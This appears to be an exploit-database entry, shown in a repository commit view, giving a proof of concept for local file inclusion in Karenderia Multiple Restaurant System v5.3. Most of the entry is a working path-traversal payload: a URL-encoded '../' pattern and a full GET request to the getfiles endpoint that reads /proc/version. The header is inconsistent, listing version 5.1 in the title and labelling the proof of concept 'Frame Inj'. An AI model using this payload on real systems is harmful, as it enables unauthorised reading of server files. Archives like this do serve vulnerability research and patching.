70a1295bcf
2 changes to exploits/shellcodes Microsoft Exchange 2003 - base64-MIME Remote Code Execution WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion (PoC) Karenderia Multiple Restaurant System 5.3 - Local File Inclusion
21 lines
No EOL
934 B
Text
21 lines
No EOL
934 B
Text
===========================================================================================
|
|
# Exploit Title: Karenderia CMS 5.1 - LFI Vuln.
|
|
# Dork: N/A
|
|
# Date: 04-07-2019
|
|
# Exploit Author: Mehmet EMIROGLU
|
|
# Software Link:
|
|
https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
|
|
# Version: v5.3
|
|
# Category: Webapps
|
|
# Tested on: Wamp64, Windows
|
|
# CVE: N/A
|
|
# Software Description: Karenderia Multiple Restaurant System is a
|
|
restaurant food ordering and restaurant membership system.
|
|
===========================================================================================
|
|
# POC - Frame Inj
|
|
# Parameters : f
|
|
# Attack Pattern :
|
|
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fversion
|
|
# GET Method :
|
|
http://localhost/kmrs/exportmanager/ajax/getfiles?f=/../../../../../../../../../../proc/version
|
|
=========================================================================================== |